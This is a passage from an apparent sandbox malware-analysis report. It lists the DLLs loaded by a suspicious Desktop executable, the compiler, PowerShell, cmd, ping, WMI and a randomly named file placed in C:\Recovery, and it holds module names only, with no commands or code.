                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: version.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: windows.storage.dll
